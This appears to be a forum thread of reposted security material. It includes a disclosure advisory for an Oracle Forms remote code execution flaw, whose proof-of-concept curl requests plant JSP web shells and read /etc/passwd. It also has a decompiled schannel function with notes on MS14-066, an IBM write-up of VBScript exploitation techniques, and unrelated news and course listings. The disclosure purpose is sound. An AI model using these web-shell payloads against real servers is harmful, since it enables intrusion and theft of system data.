Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278) Khai Tran | October 14, 2014 Vulnerability Description: Oracle Forms 10g contains code that does not properly validate user input. This could allow an unauthenticated user to execute arbitrary commands on the remote Oracle Forms server. Also affected: Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3 and 12.2.4 [1] Vulnerability Details: When a user launches a new Oracle Forms application, the application first invokes the FormsServlet class to initiate connection. The application then invokes the ListenerServlet class, which launches frmweb process in the background of the remote server. The normal URL to invoke ListenerServlet looks like: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 [/TD] [/TR] [/TABLE] With the above URL, the normal frmweb process is started with the following parameters: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1 [/TD] [/TR] [/TABLE] Where ifip parameter is controllable by user input. The frmweb executable, however, accepts one more parameter: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1,logfile [/TD] [/TR] [/TABLE] A log file, named based on the user supplied log name, is created on the server following the request. The content of the log file contains the log file name: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]FORMS CONNECTION ACTIVITY LOG FILE Developer:Forms/LogRecord [Fri May 9 16:46:58 2014 EDT]::Server Start-up Data: Server Log Filename: logfile Server Hostname: oralin6u5x86 Server Port: 0 Server Pool: 1 Server Process Id: 15638 [/TD] [/TR] [/TABLE] The Oracle Forms application does not perform adequate input validation on the logfile parameter and allows directory traversal sequences (../). By controlling the ifip parameter passed to the ListenerServlet class, an attacker can now control the logfile location and partially its content as well. Combined with the weak configuration of the remote web server that allows jsp files to be served under http://host: port/forms/java location, attacker could upload a remote shell and execute arbitrary code on the server. Technical challenges: The web server does not seem to accept white spaces or new lines; it also limits the number of characters that could be passed onto the frmweb executable. To execute Operating System command, a custom JSP shell was developed that bypass such restrictions. Verification: Proof-of-concept exploit (tested with Oracle Development Suite 10.1.2.0.2, installed on Oracle Linux 5u6): Upload first shell to execute commands (see Other Notes for the decoded version): [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1,./java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp' [/TD] [/TR] [/TABLE] After the first step, attacker could execute OS command via the blind shell, located at: http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues(“cmd”))%3b%25>.jsp. To retrieve the command results, they could use the first blind shell to write the second JSP shell, which was based of fuzzdb’s cmd.jsp [3] [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp?cmd=/bin/sh&cmd=-c&cmd=echo%20PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldElu-cHV0U3RyZWFtKCkpKTt3aGlsZSgocz1zSS5yZWFkTGluZSgpKSE9bnVsbCl7b3ArPXM7fX1jYXRjaChJT0V4Y2VwdGlvbiBlKXtlLnByaW50U3RhY2tUcmFjZSgpO30lPjwlPW9wJT4%3d|base64%20--decode%3E./forms/java/cmd.jsp' [/TD] [/TR] [/TABLE] The second shell is now available at http://127.0.0.1:8889/forms/java/cmd.jsp. To get the content of /etc/passwd on the remote server: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/java/cmd.jsp?cmd=cat+/etc/passwd' [/TD] [/TR] [/TABLE] Recommendations for Oracle: Create a white list of characters that are allowed to appear in the input and accept input composed exclusively of characters in the approved set. Consider removing support for jsp files on the remote web server if it is not required. Other notes: URL-decoded version of the first blind JSP shell: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]<%java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"));%> [/TD] [/TR] [/TABLE] Base64-decoded version of the second JSP shell: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]<%@page import="java.io.*"%><%String op="",s="";try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){op+=s;}}catch(IOException e){e.printStackTrace();}%><%=op%> [/TD] [/TR] [/TABLE] Oracle Forms 10g is also vulnerable to a simple DOS attack: each time the URL http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 is invoked, a frmweb process will be launched in the background. An attacker could exhaust server resources simply by requesting the same URL multiple times. I believe this behavior is fixed in version 11g and onwards with connection pooling For Oracle Forms 11g and onwards, it is still possible to inject into command arguments of the frmweb executable, through a different vector. However the frmweb executable does not seem to recognize that last argument as the log file location; therefore another vulnerability may be required in order to gain code execution. Since Oracle has ended its support for Forms 10g [2], the patch for Forms 10g itself was not released in the 2014 October CPU [1]. However, it appeared that Forms 10g component is still being used in E-Business Suite; therefore a patch for it was released [1]. If your organization is still using Oracle Forms 10g, I would recommend backport the fix from E-Business Suite, or upgrade to Forms version 11 or newer. Report Timeline: May 15, 2014: vulnerability was reported to Oracle. June 18, 2014: vulnerability was confirmed by Oracle October 14, 2014: patch released References: [1] Oracle Critical Patch Update - October 2014 [2] https://blogs.oracle.com/grantronald/entry/alert_for_forms_customers_running_oracle_forms_10g [3] https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp Sursa: https://blog.netspi.com/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278/
-
MS14-066 schannel.dll SPVerifySignature (Windows 2003 SP2) /* Summarizing the most likely conditions here these bugs occur: Code Execution: Heap smash via qmemcpy() if CryptDecodeObject() returns more than 40 bytes in pcbStructInfo Verification Bypass: A failed decode results in a positive return value. This is not STATUS_SUCCESS, but a caller that is checking <0 vs == 0 would think verification succeeded on a bad decode. */ //----- (7676F6D4) -------------------------------------------------------- int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 BOOL v9; // eax@8 DWORD v10; // eax@14 DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 char pvStructInfo[40]; // [sp+1Ch] [bp-2Ch]@11 phKey = 0; phHash = 0; pbSignature = 0; if ( hProv && a2 ) { // Allocate cbEncoded bytes on the heap for the signature pbSignature = (BYTE *)SPExternalAlloc(cbEncoded); if ( !pbSignature ) { // Exit early if the allocation failed v8 = -2146893056; goto LABEL_18; } // Import the key and create the hash, bailing out if it fails if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) goto LABEL_12; // Verify that CryptHashData or CryptSetHashParam succeeds (but how is a8 being set?) v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); if ( !v9 ) goto LABEL_12; if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) { // Indicate that we have 40 bytes to decode the signature value pcbStructInfo = 40; // CryptDecodeObject() states that pvStructInfo can be larger than pcbStructInfo // Bail out if the decode fails /* BOOL WINAPI CryptDecodeObject( _In_ DWORD dwCertEncodingType, (X509_ASN_ENCODING) _In_ LPCSTR lpszStructType, (X509_DSS_SIGNATURE) _In_ const BYTE *pbEncoded, (Caller) _In_ DWORD cbEncoded, (Caller) _In_ DWORD dwFlags, (0) _Out_ void *pvStructInfo, (40 byte stack variable) _Inout_ DWORD *pcbStructInfo (in:40, out:arbitrary) ); pcbStructInfo [in, out]: A pointer to a DWORD value specifying the size, in bytes, of the buffer pointed to by the pvStructInfo parameter. When the function returns, this DWORD value contains the size of the decoded data copied to pvStructInfo. The size contained in the variable pointed to by pcbStructInfo can indicate a size larger than the decoded structure, as the decoded structure can include pointers to other structures. This size is the sum of the size needed by the decoded structure and other structures pointed to. */ if ( !CryptDecodeObject(X509_ASN_ENCODING, X509_DSS_SIGNATURE, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) { LABEL_12: // this might be the signature bypass vector if the caller incorrectly checks <0 vs STATUS_SUCCESS GetLastError(); v8 = 3; goto LABEL_18; } v10 = pcbStructInfo; // This is likely our RCE vector, if pcbStructInfo > cbEncoded qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); // Changes cbEncoded to the (possibly bad) returned value of pcbStructInfo cbEncoded = v10; } else { ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); } v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; } else { v8 = -1; } LABEL_18: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) CryptDestroyHash(phHash); if ( pbSignature ) SPExternalFree(pbSignature); return v8; } Sursa: https://gist.github.com/hmoore-r7/3379af8b0419ddb0c76b
-
OpenSUSE 13.2 OpenSUSE 13.2 supercharged with smoother setup, system snapshots, Btrfs, and more Chris Hoffman @chrisbhoffman OpenSUSE 13.2 was released a week ago. As with the recent Fedora update, the latest release of openSUSE took a year to develop instead of the standard six months as the organization retooled its development practices. SUSE Linux has now been around for over 20 years, and it’s still going strong. As usual, the latest release serves as a foundation for developing Novell’s SUSE Linux Enterprise and brings some significant new improvements. So let’s dive right in! A streamlined installer OpenSUSE provides live media, and that live media can now be persistent. This means you could set up a live openSUSE 13.2 USB stick and have your files and settings saved on it between uses. But openSUSE still recommends using an old-fashioned DVD installer disc of 4.7 GB in size for actually installing the operating system on your computer. The installer lets you choose your preferred desktop—GNOME, KDE, or another one. GNOME and KDE are on fairly equal footing in openSUSE these days, but the openSUSE community has always loved KDE. KDE 4.14 is the default, although GNOME users will also be right at home. The openSUSE installer has seen a lot of much-needed polish and streamlining. Previously, the installer had a “phase 2”—first it installed on your system, and then you’d reboot into your new system and be forced to go through an additional setup process. Now the installer does everything during the standard installation process, and there is no phase 2. The installer also has a “brand new look and feel focused on usability” and a removal of configuration screens like LDAP user authentication and printer setup. You can adjust these settings after you install the system, if you need to. Btrfs and file system snapshots OpenSUSE uses the new Btrfs file system by default. If you prefer another Linux distribution, it will probably start using Btrfs soon, too. It’s clear that this is the future file system that will replace ext4, so the only question is when it’s stable enough for Linux distributions to flip the switch. OpenSUSE has decided the time is now. Btrfs is sometimes pronounced “better FS,” and that’s what it is. It’s faster, more robust, and more modern. One of its most interesting features is the ability to create file system snapshots. OpenSUSE uses this to great effect, providing a boot menu option that allows you to boot straight into those previous snapshots via the “Snapper” tool. This is great for recovering from system problems, as it allows you to boot straight into an older file system state before corruption and other problems occurred. The snapshot feature is also available in the just-released SUSE Linux Enterprise Server 12. This is an enterprise-grade feature—not just a new-and-unstable toy. Want to stay up to date on Linux, BSD, Chrome OS, and the rest of the World Beyond Windows? Bookmark the World Beyond Windows column page or follow our RSS feed. Yet another faster setup tool The YaST configuration tool—literally an abbreviation for “Yet another Setup Tool”—is used for system configuration. This has always been one of SUSE’s most distinctive features. In the past, it’s sometimes been overly slow and clunky, but it also provides a one-stop graphical configuration interface for practically everything you’d want to do when configuring a Linux system, from modifying your bootloader’s menu to configuring various different types of servers. OpenSUSE 13.2's YAST on the KDE desktop environment. In openSUSE 13.1, YaST was rewritten in the Ruby programming language. They’ve now had time to polish that work better. YaST is now faster, more stable, and better integrated with Btrfs, systemd, and other modern technologies. The usual upgrades As usual with Linux distribution updates, many— if not most—of the changes you’ll see are just the result of upgrading to the latest versions of the various upstream software packages. This means Linux kernel 3.16, KDE 4.14, and GNOME 3.14. OpenSUSE’s repositories now include the MATE desktop, too—good news for GNOME 2 diehards! A preview of KDE’s new Plasma 5.1 desktop is also available. For more details about all the various changes, check out the official list of major features. Sursa: OpenSUSE 13.2 Linux adds smoother setup, system snapshots, Btrfs, more
-
Iesim in strada, imi plac protestele
-
Microsoft's silent, secret security updates Summary: Does Microsoft find and fix security problems in their own products? You might assume so, but the company gives no reason to believe it. I assume they do, but silently. By Larry Seltzer for Zero Day | November 12, 2014 -- 13:00 GMT (05:00 PST) It's an odd and conspicuous feature of Microsoft's security bulletins that they never report vulnerabilities found internally at Microsoft. All of the credits go to outsiders. For example, yesterday's Patch Tuesday updates fixed 32 identified vulnerabilities, none of which were credited to Microsoft. These companies, bug bounty programs and individuals were credited: Baidu Security Team (X-Team) Context Information Security EY Esage Lab Google Project Zero Google Security Team HP's Zero Day Initiative IBM X-Force Kaspersky Lab KoreLogic Security McAfee Security Team Palo Alto Networks Qihoo 360 Secunia Research Two unaffiliated individuals: Takeshi Terada, Daniel Trebbien I eyeballed every disclosure released this year and saw no vulnerabilities credited to Microsoft. I've been following this for many years and can say that it's always been thus. There are some vaguer cases. The blockbuster Schannel vulnerability in MS14-066 is stated to be "privately-reported" but no credit is given; this happens now and then, perhaps ten times this year. Sometimes the credited party is named with no organizational affiliation, as with the two individuals in the list above, but I've checked a bunch of these and none of them are Microsoft people. Sometimes the credited party is anonymous, but always reported as an outsider reporting to Microsoft. (As an aside, with this month Microsoft has started putting all the credits in a single acknowledgements page rather than spreading them around the individual security bulletins.) Does Microsoft actually never find vulnerabilities in their own products? This is hard to believe. Both Google and Apple regularly give credit to internal researchers. If Microsoft does find vulnerabilities, what's happening to them? Does Microsoft just not fix them? Do they pass them on to friends who get bug bounties from HP's ZDI (Zero Day Initiative)? Or maybe Microsoft or their employees go directly to ZDI. Consider these two credits from the August Cumulative Security Update for Internet Explorer: An anonymous researcher, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4052) Sky, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4058) Who's to say these aren't Microsoft employees? But I think it's more likely Microsoft is hiding security updates inside other updates, such as non-security updates. Consider the episode a few months ago when Microsoft had to pull a number of updates after they borked users' systems. One of those updates was an "Update to support the new currency symbol for the Russian ruble in Windows." This is one of the updates that caused systems to go into infinite reboot loops. Just for adding a new Ruble symbol to the system you get that kind of catastrophic failure? Perhaps there was more to it. Alternatively, Microsoft could be hiding security updates inside of other security updates. There have been ten Cumulative Updates for Internet Explorer so far this year. It would be easy to hide another patch in one of those. In the September Cumulative Update Microsoft said "In addition to the changes that are listed for the vulnerabilities described in this bulletin, this update includes defense-in-depth updates to the Internet Explorer XSS Filter to help improve security-related features." The same text is in the June Cumulative Update. That's some pretty elastic description there and Cumulative updates, by definition, are large and complicated. The main argument for why I'm wrong is that it would be possible for outsiders to reverse-engineer the differences between versions, as they are said to do in order to find the vulnerable code and write exploits for it, and they would then write exploits for the silently-patched vulnerabilities. But perhaps this actually happens all the time. (That's what I see as the main argument; please tell me why you think I'm wrong in the comments below.) Of course I don't actually know that Microsoft is hiding secret security updates, but the alternatives aren't exactly flattering. It's especially odd to think that Microsoft doesn't hunt for security bugs in their own products when they do so in other companies'. Just yesterday, one of the many vulnerabilities fixed by Adobe in Flash Player (CVE-2014-8442) was reported by "Behrang Fouladi and Axel Souchet of Microsoft Vulnerability Research." Over the last ten years or so Microsoft has gone to great lengths to gain credibility in security and I think they are generally respected in this regard. Why would they not acknowledge any internally-discovered vulnerabilities? Sounds incredible to me. Microsoft declined to comment. Sursa: Microsoft's silent, secret security updates | ZDNet
-
Adobe fixes 18 vulnerabilities in Flash Player By Lucian Constantin IDG News Service | Nov 12, 2014 5:20 AM PT Adobe Systems released critical security updates Tuesday for Flash Player to address 18 vulnerabilities, many of which can be remotely exploited to compromise underlying systems. Fifteen of the patched vulnerabilities can result in arbitrary code execution, one can be exploited to disclose session tokens and two allow attackers to escalate their privileges from the low to medium integrity level, Adobe said in a security advisory. The company advises Windows and Mac users to update to the newly released Flash Player version 15.0.0.223. Linux users should update to Flash Player 11.2.202.418. The Flash Player Extended Support Release, which is based on Flash Player 13 was also updated to version 13.0.0.252. [What's wrong with this picture? The NEW clean desk test]The Flash Player plug-ins bundled with Google Chrome and Internet Explorer on Windows 8 and 8.1 will be upgraded automatically through those browsers' update mechanisms. Adobe also released new versions of Adobe AIR, the company's runtime and software development kit (SDK) for rich Internet applications, because it bundles Flash Player. Users of the AIR desktop and Android runtime, as well as users of AIR SDK and AIR SDK & Compiler should update to version 15.0.0.356. Many of the vulnerabilities patched in these new Flash Player releases were found and reported by researchers from Google, Microsoft, McAfee and Trend Micro. Adobe said via email that it is not aware of exploits for these vulnerabilities being used in the wild. However, as demonstrated last month, cybercriminals don't waste a lot of time before they start to attack newly patched Flash Player flaws. Lucian Constantin — Romania Correspondent Lucian Constantin writes about information security, privacy, and data protection for the IDG News Service. Sursa: Adobe fixes 18 vulnerabilities in Flash Player | CSO Online
-
ntroductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration Creator: Xeno Kovah @XenoKovah License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code. Lab Requirements: Requires a 64 bit Windows 7 system with Visual C++ 2012 Express Edition. Requires a 64 bit Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual. Class Textbook: "Introduction to 64 Bit Assembly Programming for Linux and OS X: Third Edition" by Ray Seyfarth Recommended Class Duration: 2 days Creator Available to Teach In-Person Classes: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of time will be spent learning Linux tools for analysis. This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. The instructor-led lab work will include: * Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov) * Stepping through a slightly more complicated program (adds lea(load effective address), add, sub) * Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in ams) * Understanding conditional control flow and how loops are translated from C to asm(conditional jumps, jge(jump greater than or equal), jle(jump less than or equal), ja(jump above), cmp (compare), test, etc) * Boolean logic (and, or, xor, not) * Logical and Arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar(arithmetic shift right)) * Signed and unsigned multiplication and division * Special one instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep mov (repeat mov) * Misc instructions like leave and nop (no operation) * Running examples in the Visual Studio debugger on Windows and the Gnu Debugger (GDB) on Linux * The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb giving the correct input to avoid it “blowing up”. This will be an independent activity. Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address above. Author Biography: Xeno has a BS in CS from UMN, and an MS in security from CMU, which he attended through the National Science Foundation Scholarship for Service (aka CyberCorps) program. He has been attending security conferences since 1999, working full time on security research since 2007, and presenting at conferences since 2012. He is a little bit broke in the brain in that way that makes him feel the need to collect things. Most recently he has been collecting conference speaking credits. He has presented at BlackHat USA/EUR, IEEE S&P, ACM CCS, Defcon, CanSecWest, PacSec, Hack in the Box KUL, Microsoft BlueHat, Shmoocon, Hack.lu, NoSuchCon, SummerCon, ToorCon, DeepSec, VirusBulletin, MIRCon, AusCERT, Trusted Infrastructure Workshop, NIST NICE Workshop, DOD Information Assurance Symposium, and MTEM. His joint work has also been presented by his colleagues at Syscan, EkoParty, Hack in the Box AMS, Hack in Paris, Sec-T, SecTor, Source Boston, and Breakpoint/Ruxcon. Gotta collect ‘em all! (he says, as someone who is *not* of the Pokemon generation, but understands that particular form of psychological manipulation) Class Materials All Materials (.zip of .pptx 302 slides), pdf(manuals), visual studio(code) files) All Materials (.zip of .key(302 slides), pdf(manuals), visual studio(code) files) All Materials (.zip of .pdf(302 slides), pdf(manuals), visual studio(code) files) Introduction (26 slides) Refreshers (5 slides) Architecture (19 slides) The Stack (22 slides) Example 1 (43 slides) Local variables (15 slides) Function parameter passing (14 slides) Control flow (15 slides) Boolean logic (9 slides) Shifts (11 slides) Multiply & divide (5 slides) Rep Stos (9 slides) Rep Movs (8 slides) Assembly syntax (Intel vs. AT&T syntax) (4 slides) Linux tools (21 slides) Inline assembly & raw byte emitting (10 slides) Read The Fun Manual! (20 slides) Variable length assembly instructions (3 slides) Effects of compiler options (4 slides) Bomb lab (6 slides) Messing with disasemblers (7 slides) Twos compliment (6 slides) Basic buffer overflow lab (12 slides) Conclusion (8 slides) Visual Studio Express 2012 code for labs 64 bit compiled copy of CMU Linux bomb lab ELF executable (originally from here) Sursa: http://opensecuritytraining.info/IntroX86-64.html
-
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows By Robert Freeman • November 11, 2014 The IBM X-Force Research team has identified a significant data manipulation vulnerability (CVE-2014-6332) with a CVSS score of 9.3 in every version of Microsoft Windows from Windows 95 onward. We reported this issue with a working proof-of-concept exploit back in May 2014, and today, Microsoft is patching it. It can be exploited remotely since Microsoft Internet Explorer (IE) 3.0. This complex vulnerability is a rare, “unicorn-like” bug found in code that IE relies on but doesn’t necessarily belong to. The bug can be used by an attacker for drive-by attacks to reliably run code remotely and take over the user’s machine — even sidestepping the Enhanced Protected Mode (EPM) sandbox in IE 11 as well as the highly regarded Enhanced Mitigation Experience Toolkit (EMET) anti-exploitation tool Microsoft offers for free. What Does This Mean? First, this means that significant vulnerabilities can go undetected for some time. In this case, the buggy code is at least 19 years old and has been remotely exploitable for the past 18 years. Looking at the original release code of Windows 95, the problem is present. With the release of IE 3.0, remote exploitation became possible because it introduced Visual Basic Script (VBScript). Other applications over the years may have used the buggy code, though the inclusion of VBScript in IE 3.0 makes it the most likely candidate for an attacker. In some respects, this vulnerability has been sitting in plain sight for a long time despite many other bugs being discovered and patched in the same Windows library (OleAut32). Second, it indicates that there may be other bugs still to be discovered that relate more to arbitrary data manipulation than more conventional vulnerabilities such as buffer overflows and use-after-free issues. These data manipulation vulnerabilities could lead to substantial exploitation scenarios from the manipulation of data values to remote code execution. In fact, there may be multiple exploitation techniques that lead to possible remote code execution, as is the case with this particular bug. Typically, attackers use remote code execution to install malware, which may have any number of malicious actions, such as keylogging, screen-grabbing and remote access. IBM X-Force has had product coverage with its network intrusion prevention system (IPS) since reporting this vulnerability back in May 2014, though X-Force hasn’t found any evidence of exploitation of this particular bug in the wild. I have no doubt that it would have fetched six figures on the gray market. The proof of concept IBM X-Force built uses a technique that other people have discovered, too. In fact, it was presented at this year’s Black Hat USA Conference. Technical Description In VBScript, array elements are actually Component Object Model (COM) SafeArrays. Each element is a fixed size of 16 bytes, with an initial WORD indicating the Variant type. Under normal circumstances, one will only have control of a maximum of 8 bytes of this data through either the Variant type for double values or for currency values. Array Elements: | Variant Type (WORD) | Padding (WORD) | Data High (DWORD) | Data Low (DWORD) | Cutting to the chase, VBScript permits in-place resizing of arrays through the command “redim preserve.” This is where the vulnerability is. redim preserve arrayname( newsizeinelements ) VBScript.dll contains a runtime evaluation method, CScriptRuntime::Run(VAR *), which farms out the SafeArray redimension task to OleAut32.dll with the SafeArrayRedim(…) function. Essentially, what happens is that fairly early on, SafeArrayRedim() will swap out the old array size (element count) with the resize request. However, there is a code path where, if an error occurs, the size is not reset before returning to the calling function, VBScript!CScriptRuntime::Run(). For VBScript, exploitation of this bug could have been avoided by invalidating the common “On Error Resume Next” VBScript code when the OleAut32 library returns with an error. Since it doesn’t, one can simply rely on this statement to regain script execution and continue to use “corrupted” objects. This VBScript code snippet is extremely common and its presence would not indicate that this vulnerability has been exploited. Exploitation of Vulnerability This is the fun part. Although the bug originates in some very old code within the OleAut32 library, I’m approaching exploitation from the perspective of VBScript within Internet Explorer because all versions since 3.0 are vulnerable through this vector. Exploitation is tricky, partially because array elements are a fixed size. Yet there are two additional issues that complicate exploitation. The first is that there is little opportunity to place arbitrary data where VBScript arrays are stored on the IE heap. The second issue is that, assuming you are now addressing outside the bounds of your VBScript array (Safe Array), you will find the unpleasant enforcement of Variant type compatibility matching. In the end, the key to exploitation toward reliable code execution was to take advantage of the difference in the element alignment of the arrays (16 bytes) and the alignment of the Windows heap (8 bytes). This provides opportunities to change the Variant type in an element of an adjacent array and to read that content back through the original array reference. In short, with this kind of memory manipulation available, an attacker can do a number of things. One possibility is to create arbitrary dispatch pointers for VT_DISPATCH or VT_UKNOWN types. This can lead to Data Execution Prevention (DEP) firing if the specified pointer does not correspond to a memory address with execution enabled. There are ways around that, too, but I’ll return to that later. Another possibility would be to use this attack to grab some heap data, but that is a little inconvenient because, again, you run into Variant type compatibility matching. If the location outside of the array boundary that would hold the Variant type is not a known Variant ID or combination on a read operation, or if it is not directly compatible on a write operation, nothing further will happen. However, again, one can abuse the Variant type of objects in the array. So if attackers start with a BSTR and create a Unicode representation of the data they want another type to point to, it can be used to create objects that can lead to more elaborate exploits. At the time I made the vulnerability discovery, I also happened to run across a blog post hinting that a combination of VT_ARRAY and VT_VARIANT could be useful in this respect. Massaging the data for the VT_VARIANT|VT_ARRAY object permits the use of any virtual address instead of being stuck with the relative addresses of the array boundaries we resized. Furthermore, as we are now dealing with an array of variants, we can use the vartype() command to obtain 16 bits of information from any address we specify. The reason for the 16 bits is just that COM variants max out at 16 bits of data. While we still have to deal with the variant compatibly enforcement, many exciting possibilities now exist. One of these possibilities permits a data-only attack. The next step for this possibility leverages a memory leak leading to the VBScript class object instance. Content can be left behind in the array data that was never intended to be read. By again changing the variant type of an object in the adjacent array, we can read information that ends up being the point to the VBScript class object. Coincidentally, multiple security researchers may have noticed that both Jscript and VBScript from Microsoft have a check to see whether they are running in a safe mode such as at the command prompt. This check looks at a member of the VBScript (or Jscript) class object to see whether it is in this safe mode. Another great coincidence is that not only can we reliably get to this location in memory using the address leak just discussed, but the nearby data in memory should always pass the variant type compatibility test and permit us to change the value and get code execution indirectly through running unsafe COM objects (think ActiveX) with arbitrary parameters. This is the same attack technique that Yang Yu presented at the Black Hat USA conference this year called the “Vital Point Strike.” Using this approach, which does not use shellcode or more exotic means such as return-oriented programming gadgets, both the EPM sandbox in IE as well as use of Microsoft’s EMET tool are bypassed. Let’s return to DEP for a moment. There are options here. For example, if there is any read+write+execute (+RWE) memory in a predictable location, we can manipulate objects to point to that memory. Similarly, we could create a large BSTR by pointing a BSTR to the +RWE memory and using the arbitrary write on top of null characters from the +RWE memory to set a large size. The hope is that we could do some in-place modifications with Unicode representations of shellcode. I haven’t tested this out, but it is an interesting idea. Subsequently, we could create arbitrary VT_DISPATCH or VT_UNKNOWN pointers that enable us to point back into the +RWE under our control. However, loading objects or plugins known to create +RWE by default is still a bit of a hassle. If we have the ability to read arbitrary memory and create arbitrary VT_DISPATCH and VT_UNKNOWN pointers, and we have some ability to control data in memory — either through ordinary heap data we can use with our VBScript and/or data we can touch and change (compatibility testing passes) — we should have no trouble creating Windows API calls. This happens to be another method Yang presented and called “Interdimensional Code Execution.” In fact, using it to disable DEP is possible but somewhat of a waste of an elegant approach for a sledgehammer result. Hopefully, if you’ve made it this far, you have a pretty good idea how powerful the data attacks facilitated by this bug can be. Again, our disclosure was originally submitted a number of months ago, and while we are not exclusive with the exploitation techniques described, it contributes well toward our goal of describing a significant vulnerability and how it was turned into a viable proof-of-concept attack toward disclosure. We incorporated product coverage for the OLE vulnerability with our network IPS, and so far, the signature we developed has not fired. However, for the attack techniques discussed, I think it is a only matter of time before we see them in the wild. Sursa: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows
-
